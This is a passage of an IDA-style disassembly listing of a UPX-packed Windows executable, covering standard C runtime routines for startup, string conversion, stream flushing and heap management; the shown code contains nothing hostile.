; sub_419594+55�p ...
arg_0 = dword ptr 4
mov ecx, [esp+arg_0]
cmp word ptr [ecx], 0
lea eax, [ecx+2]
jz short loc_41D82E
loc_41D824: ; CODE XREF: sub_41D817+15�j
mov dx, [eax]
inc eax
inc eax
test dx, dx
jnz short loc_41D824
loc_41D82E: ; CODE XREF: sub_41D817+B�j
sub eax, ecx
sar eax, 1
dec eax
retn
sub_41D817 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41D834 proc near ; CODE XREF: sub_4185A5+7F�p
; sub_4185A5+90�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
mov edx, [ebp+arg_0]
push ebx
push esi
xor esi, esi
xor eax, eax
cmp edx, esi
push edi
jz loc_41D901
mov edi, [ebp+arg_8]
cmp edi, esi
jz loc_41D92E
cmp ds:dword_4DBA14, esi
jnz short loc_41D885
cmp edi, esi
jbe loc_41D92E
loc_41D864: ; CODE XREF: sub_41D834+4A�j
mov ecx, [ebp+arg_4]
add ecx, eax
movzx si, byte ptr [ecx]
mov [edx], si
cmp byte ptr [ecx], 0
jz loc_41D92E
inc eax
inc edx
inc edx
cmp eax, edi
jb short loc_41D864
jmp loc_41D92E
; ---------------------------------------------------------------------------
loc_41D885: ; CODE XREF: sub_41D834+26�j
mov ebx, [ebp+arg_4]
mov esi, dword_427180
push edi
push edx
push 0FFFFFFFFh
push ebx
push 9
push ds:dword_4DBA24
call esi ; MultiByteToWideChar
test eax, eax
jnz loc_41D92D
call dword_42708C ; RtlGetLastWin32Error
cmp eax, 7Ah
jz short loc_41D8BF
loc_41D8B0: ; CODE XREF: sub_41D834+CB�j
; sub_41D834+F7�j
mov ds:dword_4DB958, 2Ah
or eax, 0FFFFFFFFh
jmp short loc_41D92E
; ---------------------------------------------------------------------------
loc_41D8BF: ; CODE XREF: sub_41D834+7A�j
lea ecx, [edi-1]
mov eax, ebx
mov [ebp+arg_4], ecx
loc_41D8C7: ; CODE XREF: sub_41D834+B3�j
mov cl, [eax]
test cl, cl
jz short loc_41D8E9
mov edx, off_43C9D8
movzx ecx, cl
test byte ptr [edx+ecx*2+1], 80h
jz short loc_41D8DE
inc eax
loc_41D8DE: ; CODE XREF: sub_41D834+A7�j
mov ecx, [ebp+arg_4]
inc eax
dec [ebp+arg_4]
test ecx, ecx
jnz short loc_41D8C7
loc_41D8E9: ; CODE XREF: sub_41D834+97�j
push edi
sub eax, ebx
push [ebp+arg_0]
push eax
push ebx
push 1
push ds:dword_4DBA24
call esi ; MultiByteToWideChar
test eax, eax
jnz short loc_41D92E
jmp short loc_41D8B0
; ---------------------------------------------------------------------------
loc_41D901: ; CODE XREF: sub_41D834+F�j
cmp ds:dword_4DBA14, esi
jnz short loc_41D914
push [ebp+arg_4]
call sub_41AFE0
pop ecx
jmp short loc_41D92E
; ---------------------------------------------------------------------------
loc_41D914: ; CODE XREF: sub_41D834+D3�j
push esi
push esi
push 0FFFFFFFFh
push [ebp+arg_4]
push 9
push ds:dword_4DBA24
call dword_427180 ; MultiByteToWideChar
cmp eax, esi
jz short loc_41D8B0
loc_41D92D: ; CODE XREF: sub_41D834+6B�j
dec eax
loc_41D92E: ; CODE XREF: sub_41D834+1A�j
; sub_41D834+2A�j ...
pop edi
pop esi
pop ebx
pop ebp
retn
sub_41D834 endp
; ---------------------------------------------------------------------------
loc_41D933: ; CODE XREF: UPX1:004DF3F4�j
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_427718
push offset sub_4234B8
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 58h
push ebx
push esi
push edi
mov [ebp-18h], esp
call dword_4271B0 ; GetVersion
xor edx, edx
mov dl, ah
mov ds:dword_4DB970, edx
mov ecx, eax
and ecx, 0FFh
mov ds:dword_4DB96C, ecx
shl ecx, 8
add ecx, edx
mov ds:dword_4DB968, ecx
shr eax, 10h
mov ds:dword_4DB964, eax
xor esi, esi
push esi
call sub_41DDD2
pop ecx
test eax, eax
jnz short loc_41D99F
push 1Ch
call sub_41DA4E
pop ecx
loc_41D99F: ; CODE XREF: UPX0:0041D995�j
mov [ebp-4], esi
call sub_423302
call dword_4271AC ; GetCommandLineA
mov ds:dword_4DCFEC, eax
call sub_4231D0
mov ds:dword_4DB9C8, eax
call sub_422F83
call sub_422ECA
call sub_41B784
mov [ebp-30h], esi
lea eax, [ebp-5Ch]
push eax
call dword_4271A8 ; GetStartupInfoA
call sub_422E72
mov [ebp-64h], eax
test byte ptr [ebp-30h], 1
jz short loc_41D9EC
movzx eax, word ptr [ebp-2Ch]
jmp short loc_41D9EF
; ---------------------------------------------------------------------------
loc_41D9EC: ; CODE XREF: UPX0:0041D9E4�j
push 0Ah
pop eax
loc_41D9EF: ; CODE XREF: UPX0:0041D9EA�j
push eax
push dword ptr [ebp-64h]
push esi
push esi
call dword_42709C ; GetModuleHandleA
push eax
call sub_401221
mov [ebp-60h], eax
push eax
call sub_41B7B1
mov eax, [ebp-14h]
mov ecx, [eax]
mov ecx, [ecx]
mov [ebp-68h], ecx
push eax
push ecx
call sub_422CEE
pop ecx
pop ecx
retn
; ---------------------------------------------------------------------------
mov esp, [ebp-18h]
push dword ptr [ebp-68h]
call sub_41B7C2
; =============== S U B R O U T I N E =======================================
sub_41DA29 proc near ; CODE XREF: sub_41D052+16�p
; sub_422ECA+4E�p ...
arg_0 = dword ptr 4
cmp ds:dword_4DB9D0, 1
jnz short loc_41DA37
call sub_423590
loc_41DA37: ; CODE XREF: sub_41DA29+7�j
push [esp+arg_0]
call sub_4235C9
push 0FFh
call off_43A9A0
pop ecx
pop ecx
retn
sub_41DA29 endp
; =============== S U B R O U T I N E =======================================
sub_41DA4E proc near ; CODE XREF: UPX0:0041D999�p
arg_0 = dword ptr 4
cmp ds:dword_4DB9D0, 1
jnz short loc_41DA5C
call sub_423590
loc_41DA5C: ; CODE XREF: sub_41DA4E+7�j
push [esp+arg_0]
call sub_4235C9
pop ecx
push 0FFh
call dword_427064 ; ExitProcess
retn
sub_41DA4E endp
; =============== S U B R O U T I N E =======================================
sub_41DA72 proc near ; CODE XREF: sub_41B05B+2A�p
; sub_423A33+290�p
arg_0 = dword ptr 4
push ebx
push ebp
push esi
push edi
mov edi, [esp+10h+arg_0]
cmp edi, ds:dword_4DCDA0
jnb loc_41DB0C
mov eax, edi
mov esi, edi
sar eax, 5
and esi, 1Fh
lea ebx, ds:4DCCA0h[eax*4]
shl esi, 3
mov eax, [ebx]
test byte ptr [eax+esi+4], 1
jz short loc_41DB0C
push edi
call sub_4238A2
cmp eax, 0FFFFFFFFh
pop ecx
jz short loc_41DAEB
cmp edi, 1
jz short loc_41DAB9
cmp edi, 2
jnz short loc_41DACF
loc_41DAB9: ; CODE XREF: sub_41DA72+40�j
push 2
call sub_4238A2
push 1
mov ebp, eax
call sub_4238A2
pop ecx
cmp eax, ebp
pop ecx
jz short loc_41DAEB
loc_41DACF: ; CODE XREF: sub_41DA72+45�j
push edi
call sub_4238A2
pop ecx
push eax
call dword_427068 ; CloseHandle
test eax, eax
jnz short loc_41DAEB
call dword_42708C ; RtlGetLastWin32Error
mov ebp, eax
jmp short loc_41DAED
; ---------------------------------------------------------------------------
loc_41DAEB: ; CODE XREF: sub_41DA72+3B�j
; sub_41DA72+5B�j ...
xor ebp, ebp
loc_41DAED: ; CODE XREF: sub_41DA72+77�j
push edi
call sub_423828
mov eax, [ebx]
pop ecx
and byte ptr [eax+esi+4], 0
test ebp, ebp
jz short loc_41DB08
push ebp
call sub_4203DF
pop ecx
jmp short loc_41DB1D
; ---------------------------------------------------------------------------
loc_41DB08: ; CODE XREF: sub_41DA72+8B�j
xor eax, eax
jmp short loc_41DB20
; ---------------------------------------------------------------------------
loc_41DB0C: ; CODE XREF: sub_41DA72+E�j
; sub_41DA72+2F�j
and ds:dword_4DB95C, 0
mov ds:dword_4DB958, 9
loc_41DB1D: ; CODE XREF: sub_41DA72+94�j
or eax, 0FFFFFFFFh
loc_41DB20: ; CODE XREF: sub_41DA72+98�j
pop edi
pop esi
pop ebp
pop ebx
retn
sub_41DA72 endp
; =============== S U B R O U T I N E =======================================
sub_41DB25 proc near ; CODE XREF: sub_41B05B+22�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
mov eax, [esi+0Ch]
test al, 83h
jz short loc_41DB4E
test al, 8
jz short loc_41DB4E
push dword ptr [esi+8]
call sub_41B0B1
and word ptr [esi+0Ch], 0FBF7h
xor eax, eax
pop ecx
mov [esi], eax
mov [esi+8], eax
mov [esi+4], eax
loc_41DB4E: ; CODE XREF: sub_41DB25+A�j
; sub_41DB25+E�j
pop esi
retn
sub_41DB25 endp
; =============== S U B R O U T I N E =======================================
sub_41DB50 proc near ; CODE XREF: sub_41DBF0+2D�p
; sub_41DBF0+48�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
test esi, esi
jnz short loc_41DB62
push esi
call sub_41DBF0
pop ecx
pop esi
retn
; ---------------------------------------------------------------------------
loc_41DB62: ; CODE XREF: sub_41DB50+7�j
push esi
call sub_41DB8B
test eax, eax
pop ecx
jz short loc_41DB72
or eax, 0FFFFFFFFh
pop esi
retn
; ---------------------------------------------------------------------------
loc_41DB72: ; CODE XREF: sub_41DB50+1B�j
test byte ptr [esi+0Dh], 40h
jz short loc_41DB87
push dword ptr [esi+10h]
call sub_4238DF
neg eax
pop ecx
pop esi
sbb eax, eax
retn
; ---------------------------------------------------------------------------
loc_41DB87: ; CODE XREF: sub_41DB50+26�j
xor eax, eax
pop esi
retn
sub_41DB50 endp
; =============== S U B R O U T I N E =======================================
sub_41DB8B proc near ; CODE XREF: sub_41B05B+1A�p
; sub_41D1EC+37�p ...
arg_0 = dword ptr 4
push ebx
push esi
mov esi, [esp+8+arg_0]
xor ebx, ebx
push edi
mov eax, [esi+0Ch]
mov ecx, eax
and ecx, 3
cmp cl, 2
jnz short loc_41DBD8
test ax, 108h
jz short loc_41DBD8
mov eax, [esi+8]
mov edi, [esi]
sub edi, eax
test edi, edi
jle short loc_41DBD8
push edi
push eax
push dword ptr [esi+10h]
call sub_42291D
add esp, 0Ch
cmp eax, edi
jnz short loc_41DBD1
mov eax, [esi+0Ch]
test al, 80h
jz short loc_41DBD8
and al, 0FDh
mov [esi+0Ch], eax
jmp short loc_41DBD8
; ---------------------------------------------------------------------------
loc_41DBD1: ; CODE XREF: sub_41DB8B+36�j
or dword ptr [esi+0Ch], 20h
or ebx, 0FFFFFFFFh
loc_41DBD8: ; CODE XREF: sub_41DB8B+14�j
; sub_41DB8B+1A�j ...
mov eax, [esi+8]
and dword ptr [esi+4], 0
mov [esi], eax
pop edi
mov eax, ebx
pop esi
pop ebx
retn
sub_41DB8B endp
; =============== S U B R O U T I N E =======================================
sub_41DBE7 proc near ; CODE XREF: sub_4239DB�p
push 1
call sub_41DBF0
pop ecx
retn
sub_41DBE7 endp
; =============== S U B R O U T I N E =======================================
sub_41DBF0 proc near ; CODE XREF: sub_41DB50+A�p
; sub_41DBE7+2�p
arg_0 = dword ptr 4
push ebx
push esi
push edi
xor esi, esi
xor ebx, ebx
xor edi, edi
cmp ds:dword_4DCC80, esi
jle short loc_41DC4E
loc_41DC01: ; CODE XREF: sub_41DBF0+5C�j
mov eax, ds:dword_4DBC78
mov eax, [eax+esi*4]
test eax, eax
jz short loc_41DC45
mov ecx, [eax+0Ch]
test cl, 83h
jz short loc_41DC45
cmp [esp+0Ch+arg_0], 1
jnz short loc_41DC2B
push eax
call sub_41DB50
cmp eax, 0FFFFFFFFh
pop ecx
jz short loc_41DC45
inc ebx
jmp short loc_41DC45
; ---------------------------------------------------------------------------
loc_41DC2B: ; CODE XREF: sub_41DBF0+2A�j
cmp [esp+0Ch+arg_0], 0
jnz short loc_41DC45
test cl, 2
jz short loc_41DC45
push eax
call sub_41DB50
cmp eax, 0FFFFFFFFh
pop ecx
jnz short loc_41DC45
or edi, eax
loc_41DC45: ; CODE XREF: sub_41DBF0+1B�j
; sub_41DBF0+23�j ...
inc esi
cmp esi, ds:dword_4DCC80
jl short loc_41DC01
loc_41DC4E: ; CODE XREF: sub_41DBF0+F�j
cmp [esp+0Ch+arg_0], 1
mov eax, ebx
jz short loc_41DC59
mov eax, edi
loc_41DC59: ; CODE XREF: sub_41DBF0+65�j
pop edi
pop esi
pop ebx
retn
sub_41DBF0 endp
; =============== S U B R O U T I N E =======================================
sub_41DC5D proc near ; CODE XREF: sub_41DC8A+136�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
push 0
and dword ptr [esi], 0
call dword_42709C ; GetModuleHandleA
cmp word ptr [eax], 5A4Dh
jnz short loc_41DC88
mov ecx, [eax+3Ch]
test ecx, ecx
jz short loc_41DC88
add eax, ecx
mov cl, [eax+1Ah]
mov [esi], cl
mov al, [eax+1Bh]
mov [esi+1], al
loc_41DC88: ; CODE XREF: sub_41DC5D+15�j
; sub_41DC5D+1C�j
pop esi
retn
sub_41DC5D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41DC8A proc near ; CODE XREF: sub_41DDD2+20�p
var_122C = byte ptr -122Ch
var_19C = byte ptr -19Ch
var_98 = dword ptr -98h
var_94 = dword ptr -94h
var_88 = dword ptr -88h
var_4 = byte ptr -4
push ebp
mov ebp, esp
mov eax, 122Ch
call sub_41BB20
lea eax, [ebp+var_98]
push ebx
push eax
mov [ebp+var_98], 94h
call dword_4270C8 ; GetVersionExA
test eax, eax
jz short loc_41DCCD
cmp [ebp+var_88], 2
jnz short loc_41DCCD
cmp [ebp+var_94], 5
jb short loc_41DCCD
push 1
pop eax
jmp loc_41DDCF
; ---------------------------------------------------------------------------
loc_41DCCD: ; CODE XREF: sub_41DC8A+27�j
; sub_41DC8A+30�j ...
lea eax, [ebp+var_122C]
push 1090h
push eax
push offset a__msvcrt_heap_ ; "__MSVCRT_HEAP_SELECT"
call dword_4271B4 ; GetEnvironmentVariableA
test eax, eax
jz loc_41DDBC
xor ebx, ebx
lea ecx, [ebp+var_122C]
cmp [ebp+var_122C], bl
jz short loc_41DD0F
loc_41DCFC: ; CODE XREF: sub_41DC8A+83�j
mov al, [ecx]
cmp al, 61h
jl short loc_41DD0A
cmp al, 7Ah
jg short loc_41DD0A
sub al, 20h
mov [ecx], al
loc_41DD0A: ; CODE XREF: sub_41DC8A+76�j
; sub_41DC8A+7A�j
inc ecx
cmp [ecx], bl
jnz short loc_41DCFC
loc_41DD0F: ; CODE XREF: sub_41DC8A+70�j
lea eax, [ebp+var_122C]
push 16h
push eax
push offset a__global_heap_ ; "__GLOBAL_HEAP_SELECTED"
call sub_41BE70
add esp, 0Ch
test eax, eax
jnz short loc_41DD31
lea eax, [ebp+var_122C]
jmp short loc_41DD7A
; ---------------------------------------------------------------------------
loc_41DD31: ; CODE XREF: sub_41DC8A+9D�j
lea eax, [ebp+var_19C]
push 104h
push eax
push ebx
call dword_427070 ; GetModuleFileNameA
cmp [ebp+var_19C], bl
lea ecx, [ebp+var_19C]
jz short loc_41DD65
loc_41DD52: ; CODE XREF: sub_41DC8A+D9�j
mov al, [ecx]
cmp al, 61h
jl short loc_41DD60
cmp al, 7Ah
jg short loc_41DD60
sub al, 20h
mov [ecx], al
loc_41DD60: ; CODE XREF: sub_41DC8A+CC�j
; sub_41DC8A+D0�j
inc ecx
cmp [ecx], bl
jnz short loc_41DD52
loc_41DD65: ; CODE XREF: sub_41DC8A+C6�j
lea eax, [ebp+var_19C]
push eax
lea eax, [ebp+var_122C]
push eax
call sub_41B900
pop ecx
pop ecx
loc_41DD7A: ; CODE XREF: sub_41DC8A+A5�j
cmp eax, ebx
jz short loc_41DDBC
push 2Ch
push eax
call sub_41BFB0
pop ecx
cmp eax, ebx
pop ecx
jz short loc_41DDBC
inc eax
mov ecx, eax
cmp [eax], bl
jz short loc_41DDA1
loc_41DD93: ; CODE XREF: sub_41DC8A+115�j
cmp byte ptr [ecx], 3Bh
jnz short loc_41DD9C
mov [ecx], bl
jmp short loc_41DD9D
; ---------------------------------------------------------------------------
loc_41DD9C: ; CODE XREF: sub_41DC8A+10C�j
inc ecx
loc_41DD9D: ; CODE XREF: sub_41DC8A+110�j
cmp [ecx], bl
jnz short loc_41DD93
loc_41DDA1: ; CODE XREF: sub_41DC8A+107�j
push 0Ah
push ebx
push eax
call sub_41BBA6
add esp, 0Ch
cmp eax, 2
jz short loc_41DDCF
cmp eax, 3
jz short loc_41DDCF
cmp eax, 1
jz short loc_41DDCF
loc_41DDBC: ; CODE XREF: sub_41DC8A+5C�j
; sub_41DC8A+F2�j ...
lea eax, [ebp+var_4]
push eax
call sub_41DC5D
cmp [ebp+var_4], 6
pop ecx
sbb eax, eax
add eax, 3
loc_41DDCF: ; CODE XREF: sub_41DC8A+3E�j
; sub_41DC8A+126�j ...
pop ebx
leave
retn
sub_41DC8A endp
; =============== S U B R O U T I N E =======================================
sub_41DDD2 proc near ; CODE XREF: UPX0:0041D98D�p
arg_0 = dword ptr 4
xor eax, eax
push 0
cmp [esp+4+arg_0], eax
push 1000h
setz al
push eax
call dword_4271BC ; HeapCreate
test eax, eax
mov ds:dword_4DCFE4, eax
jz short loc_41DE28
call sub_41DC8A
cmp eax, 3
mov ds:dword_4DCFE8, eax
jnz short loc_41DE0E
push 3F8h
call sub_41DE2F
pop ecx
jmp short loc_41DE18
; ---------------------------------------------------------------------------
loc_41DE0E: ; CODE XREF: sub_41DDD2+2D�j
cmp eax, 2
jnz short loc_41DE2B
call sub_41E976
loc_41DE18: ; CODE XREF: sub_41DDD2+3A�j
test eax, eax
jnz short loc_41DE2B
push ds:dword_4DCFE4
call dword_4271B8 ; HeapDestroy
loc_41DE28: ; CODE XREF: sub_41DDD2+1E�j
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_41DE2B: ; CODE XREF: sub_41DDD2+3F�j
; sub_41DDD2+48�j
push 1
pop eax
retn
sub_41DDD2 endp
; =============== S U B R O U T I N E =======================================
sub_41DE2F proc near ; CODE XREF: sub_41DDD2+34�p
arg_0 = dword ptr 4
push 140h
push 0
push ds:dword_4DCFE4
call dword_427144 ; RtlAllocateHeap
test eax, eax
mov ds:dword_4DCFDC, eax
jnz short loc_41DE4C
retn
; ---------------------------------------------------------------------------
loc_41DE4C: ; CODE XREF: sub_41DE2F+1A�j
mov ecx, [esp+arg_0]
and ds:dword_4DCFD4, 0
and ds:dword_4DCFD8, 0
push 1
mov ds:dword_4DCFD0, eax
mov ds:dword_4DCFE0, ecx
mov ds:dword_4DCFC8, 10h
pop eax
retn
sub_41DE2F endp
; =============== S U B R O U T I N E =======================================
sub_41DE77 proc near ; CODE XREF: sub_41B0B1+17�p
; sub_41B202+4C�p ...
arg_0 = dword ptr 4
mov eax, ds:dword_4DCFD8
lea ecx, [eax+eax*4]
mov eax, ds:dword_4DCFDC
lea ecx, [eax+ecx*4]
loc_41DE87: ; CODE XREF: sub_41DE77+26�j
cmp eax, ecx
jnb short loc_41DE9F
mov edx, [esp+arg_0]
sub edx, [eax+0Ch]
cmp edx, 100000h
jb short locret_41DEA1
add eax, 14h
jmp short loc_41DE87
; ---------------------------------------------------------------------------
loc_41DE9F: ; CODE XREF: sub_41DE77+12�j
xor eax, eax
locret_41DEA1: ; CODE XREF: sub_41DE77+21�j
retn
sub_41DE77 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41DEA2 proc near ; CODE XREF: sub_41B0B1+23�p
; sub_41B202+A4�p ...
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 10h
mov ecx, [ebp+arg_0]
push ebx
push esi
mov esi, [ebp+arg_4]
mov eax, [ecx+10h]
push edi
mov edi, esi
add esi, 0FFFFFFFCh
sub edi, [ecx+0Ch]
shr edi, 0Fh
mov ecx, edi
imul ecx, 204h
lea ecx, [ecx+eax+144h]
mov [ebp+var_10], ecx
mov ecx, [esi]
dec ecx
test cl, 1
mov [ebp+var_4], ecx
jnz loc_41E1C6
mov edx, [ecx+esi]
lea ebx, [ecx+esi]
mov [ebp+var_C], edx
mov edx, [esi-4]
mov [ebp+var_8], edx
mov edx, [ebp+var_C]
test dl, 1
mov [ebp+arg_4], ebx
jnz short loc_41DF78
sar edx, 4
dec edx
cmp edx, 3Fh
jbe short loc_41DF06
push 3Fh
pop edx
loc_41DF06: ; CODE XREF: sub_41DEA2+5F�j
mov ecx, [ebx+4]
cmp ecx, [ebx+8]
jnz short loc_41DF5A
cmp edx, 20h
jnb short loc_41DF31
mov ebx, 80000000h
mov ecx, edx
shr ebx, cl
lea ecx, [edx+eax+4]
not ebx
and [eax+edi*4+44h], ebx
dec byte ptr [ecx]
jnz short loc_41DF52
mov ecx, [ebp+arg_0]
and [ecx], ebx
jmp short loc_41DF52
; ---------------------------------------------------------------------------
loc_41DF31: ; CODE XREF: sub_41DEA2+6F�j
lea ecx, [edx-20h]
mov ebx, 80000000h
shr ebx, cl
lea ecx, [edx+eax+4]
not ebx
and [eax+edi*4+0C4h], ebx
dec byte ptr [ecx]
jnz short loc_41DF52
mov ecx, [ebp+arg_0]
and [ecx+4], ebx
loc_41DF52: ; CODE XREF: sub_41DEA2+86�j
; sub_41DEA2+8D�j ...
mov ecx, [ebp+var_4]
mov ebx, [ebp+arg_4]
jmp short loc_41DF5D
; ---------------------------------------------------------------------------
loc_41DF5A: ; CODE XREF: sub_41DEA2+6A�j
mov ecx, [ebp+var_4]
loc_41DF5D: ; CODE XREF: sub_41DEA2+B6�j
mov edx, [ebx+8]
mov ebx, [ebx+4]
add ecx, [ebp+var_C]
mov [edx+4], ebx
mov edx, [ebp+arg_4]
mov [ebp+var_4], ecx
mov ebx, [edx+4]
mov edx, [edx+8]
mov [ebx+8], edx
loc_41DF78: ; CODE XREF: sub_41DEA2+56�j
mov edx, ecx
sar edx, 4
dec edx
cmp edx, 3Fh
jbe short loc_41DF86
push 3Fh
pop edx
loc_41DF86: ; CODE XREF: sub_41DEA2+DF�j
mov ebx, [ebp+var_8]
and ebx, 1
mov [ebp+var_C], ebx
jnz loc_41E029
sub esi, [ebp+var_8]
mov ebx, [ebp+var_8]
sar ebx, 4
push 3Fh
mov [ebp+arg_4], esi
dec ebx
pop esi
cmp ebx, esi
jbe short loc_41DFAB
mov ebx, esi
loc_41DFAB: ; CODE XREF: sub_41DEA2+105�j
add ecx, [ebp+var_8]
mov edx, ecx
mov [ebp+var_4], ecx
sar edx, 4
dec edx
cmp edx, esi
jbe short loc_41DFBD
mov edx, esi
loc_41DFBD: ; CODE XREF: sub_41DEA2+117�j
cmp ebx, edx
jz short loc_41E024
mov ecx, [ebp+arg_4]
mov esi, [ecx+4]
cmp esi, [ecx+8]
jnz short loc_41E00C
cmp ebx, 20h
jnb short loc_41DFED
mov esi, 80000000h
mov ecx, ebx
shr esi, cl
not esi
and [eax+edi*4+44h], esi
dec byte ptr [ebx+eax+4]
jnz short loc_41E00C
mov ecx, [ebp+arg_0]
and [ecx], esi
jmp short loc_41E00C
; ---------------------------------------------------------------------------
loc_41DFED: ; CODE XREF: sub_41DEA2+12D�j
lea ecx, [ebx-20h]
mov esi, 80000000h
shr esi, cl
not esi
and [eax+edi*4+0C4h], esi
dec byte ptr [ebx+eax+4]
jnz short loc_41E00C
mov ecx, [ebp+arg_0]
and [ecx+4], esi
loc_41E00C: ; CODE XREF: sub_41DEA2+128�j
; sub_41DEA2+142�j ...
mov ecx, [ebp+arg_4]
mov esi, [ecx+8]
mov ecx, [ecx+4]
mov [esi+4], ecx
mov ecx, [ebp+arg_4]
mov esi, [ecx+4]
mov ecx, [ecx+8]
mov [esi+8], ecx
loc_41E024: ; CODE XREF: sub_41DEA2+11D�j
mov esi, [ebp+arg_4]
jmp short loc_41E02C
; ---------------------------------------------------------------------------
loc_41E029: ; CODE XREF: sub_41DEA2+ED�j
mov ebx, [ebp+arg_0]
loc_41E02C: ; CODE XREF: sub_41DEA2+185�j
cmp [ebp+var_C], 0
jnz short loc_41E03A
cmp ebx, edx
jz loc_41E0BB
loc_41E03A: ; CODE XREF: sub_41DEA2+18E�j
mov ecx, [ebp+var_10]
mov ebx, [ecx+edx*8+4]
lea ecx, [ecx+edx*8]
mov [esi+4], ebx
mov [esi+8], ecx
mov [ecx+4], esi
mov ecx, [esi+4]
mov [ecx+8], esi
mov ecx, [esi+4]
cmp ecx, [esi+8]
jnz short loc_41E0BB
mov cl, [edx+eax+4]
cmp edx, 20h
mov byte ptr [ebp+arg_4+3], cl
inc cl
mov [edx+eax+4], cl
jnb short loc_41E092
cmp byte ptr [ebp+arg_4+3], 0
jnz short loc_41E081
mov ebx, 80000000h
mov ecx, edx
shr ebx, cl
mov ecx, [ebp+arg_0]
or [ecx], ebx
loc_41E081: ; CODE XREF: sub_41DEA2+1CF�j
mov ebx, 80000000h
mov ecx, edx
shr ebx, cl
lea eax, [eax+edi*4+44h]
or [eax], ebx
jmp short loc_41E0BB
; ---------------------------------------------------------------------------
loc_41E092: ; CODE XREF: sub_41DEA2+1C9�j
cmp byte ptr [ebp+arg_4+3], 0
jnz short loc_41E0A8
lea ecx, [edx-20h]
mov ebx, 80000000h
shr ebx, cl
mov ecx, [ebp+arg_0]
or [ecx+4], ebx
loc_41E0A8: ; CODE XREF: sub_41DEA2+1F4�j
lea ecx, [edx-20h]
mov edx, 80000000h
shr edx, cl
lea eax, [eax+edi*4+0C4h]
or [eax], edx
loc_41E0BB: ; CODE XREF: sub_41DEA2+192�j
; sub_41DEA2+1B7�j ...
mov eax, [ebp+var_4]
mov [esi], eax
mov [eax+esi-4], eax
mov eax, [ebp+var_10]
dec dword ptr [eax]
jnz loc_41E1C6
mov eax, ds:dword_4DCFD4
test eax, eax
jz loc_41E1B8
mov ecx, ds:dword_4DCFCC
mov esi, dword_4271C0
shl ecx, 0Fh
add ecx, [eax+0Ch]
mov ebx, 8000h
push 4000h
push ebx
push ecx
call esi ; VirtualFree
mov ecx, ds:dword_4DCFCC
mov eax, ds:dword_4DCFD4
mov edx, 80000000h
shr edx, cl
or [eax+8], edx
mov eax, ds:dword_4DCFD4
mov ecx, ds:dword_4DCFCC
mov eax, [eax+10h]
and dword ptr [eax+ecx*4+0C4h], 0
mov eax, ds:dword_4DCFD4
mov eax, [eax+10h]
dec byte ptr [eax+43h]
mov eax, ds:dword_4DCFD4
mov ecx, [eax+10h]
cmp byte ptr [ecx+43h], 0
jnz short loc_41E149
and dword ptr [eax+4], 0FFFFFFFEh
mov eax, ds:dword_4DCFD4
loc_41E149: ; CODE XREF: sub_41DEA2+29C�j
cmp dword ptr [eax+8], 0FFFFFFFFh
jnz short loc_41E1B8
push ebx
push 0
push dword ptr [eax+0Ch]
call esi ; VirtualFree
mov eax, ds:dword_4DCFD4
push dword ptr [eax+10h]
push 0
push ds:dword_4DCFE4
call dword_427140 ; RtlFreeHeap
mov eax, ds:dword_4DCFD8
mov edx, ds:dword_4DCFDC
lea eax, [eax+eax*4]
shl eax, 2
mov ecx, eax
mov eax, ds:dword_4DCFD4
sub ecx, eax
lea ecx, [ecx+edx-14h]
push ecx
lea ecx, [eax+14h]
push ecx
push eax
call sub_41CC90
mov eax, [ebp+arg_0]
add esp, 0Ch
dec ds:dword_4DCFD8
cmp eax, ds:dword_4DCFD4
jbe short loc_41E1AE
sub [ebp+arg_0], 14h
loc_41E1AE: ; CODE XREF: sub_41DEA2+306�j
mov eax, ds:dword_4DCFDC
mov ds:dword_4DCFD0, eax
loc_41E1B8: ; CODE XREF: sub_41DEA2+234�j
; sub_41DEA2+2AB�j
mov eax, [ebp+arg_0]
mov ds:dword_4DCFCC, edi
mov ds:dword_4DCFD4, eax
loc_41E1C6: ; CODE XREF: sub_41DEA2+38�j
; sub_41DEA2+227�j
pop edi
pop esi
pop ebx
leave
retn
sub_41DEA2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41E1CB proc near ; CODE XREF: sub_41B202+77�p
; sub_41B513+18�p ...
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 14h
mov eax, ds:dword_4DCFD8
mov edx, ds:dword_4DCFDC
push ebx
push esi
lea eax, [eax+eax*4]
push edi
lea edi, [edx+eax*4]
mov eax, [ebp+arg_0]
mov [ebp+var_4], edi
lea ecx, [eax+17h]
and ecx, 0FFFFFFF0h
mov [ebp+var_10], ecx
sar ecx, 4
dec ecx
cmp ecx, 20h
jge short loc_41E20B
or esi, 0FFFFFFFFh
shr esi, cl
or [ebp+var_8], 0FFFFFFFFh
mov [ebp+var_C], esi
jmp short loc_41E21B
; ---------------------------------------------------------------------------
loc_41E20B: ; CODE XREF: sub_41E1CB+30�j
add ecx, 0FFFFFFE0h
or eax, 0FFFFFFFFh
xor esi, esi
shr eax, cl
mov [ebp+var_C], esi
mov [ebp+var_8], eax
loc_41E21B: ; CODE XREF: sub_41E1CB+3E�j
mov eax, ds:dword_4DCFD0
mov ebx, eax
cmp ebx, edi
mov [ebp+arg_0], ebx
jnb short loc_41E242
loc_41E229: ; CODE XREF: sub_41E1CB+75�j
mov ecx, [ebx+4]
mov edi, [ebx]
and ecx, [ebp+var_8]
and edi, esi
or ecx, edi
jnz short loc_41E242
add ebx, 14h
cmp ebx, [ebp+var_4]
mov [ebp+arg_0], ebx
jb short loc_41E229
loc_41E242: ; CODE XREF: sub_41E1CB+5C�j
; sub_41E1CB+6A�j
cmp ebx, [ebp+var_4]
